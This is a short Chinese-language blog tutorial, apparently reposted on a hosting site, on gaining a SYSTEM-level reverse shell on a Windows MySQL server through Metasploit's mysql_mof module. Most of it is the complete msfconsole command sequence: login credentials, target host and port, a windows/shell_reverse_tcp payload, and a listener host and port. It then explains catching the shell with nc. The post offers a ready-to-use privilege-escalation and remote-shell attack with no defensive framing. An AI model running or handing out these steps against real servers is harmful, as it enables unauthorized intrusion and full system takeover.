溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

mysql mof+metasploit反彈shell

發(fā)布時間:2020-06-25 13:53:46 來源:網(wǎng)絡 閱讀:2736 作者:z2pp 欄目:MySQL數(shù)據(jù)庫

鑒于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提權

metasploit已經有針對該方式的利用代碼,原理還是一樣生成mof文件,只是metasploit中可以使用到反彈技術,就不用額外添加用戶,前提是對方服務器允許訪問公網(wǎng)

use exploit/windows/mysql/mysql_mof
set password xxx    //設置登錄mysql的密碼
set username xxx    //設置登錄mysql的用戶
set rhost xxx       //設置要登錄的ip地址
set rport xxxx      //設置mysql的端口號
set payload windows/shell_reverse_tcp    //所使用的反彈模塊
set lhost xxx       //反彈到的ip地址
set lport xxx       //反彈到的端口
show options        //設置完成后,使用該命令可查看設置參數(shù)情況
exploit             //執(zhí)行


mysql mof+metasploit反彈shell

如沒問題,即exploit執(zhí)行

這邊我們使用nc監(jiān)聽對應端口號,就可以接收到shell了,通常情況為system權限,因為mof文件是由system執(zhí)行

mysql mof+metasploit反彈shell


錯誤之處,敬請指正

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經查實,將立刻刪除涉嫌侵權內容。

AI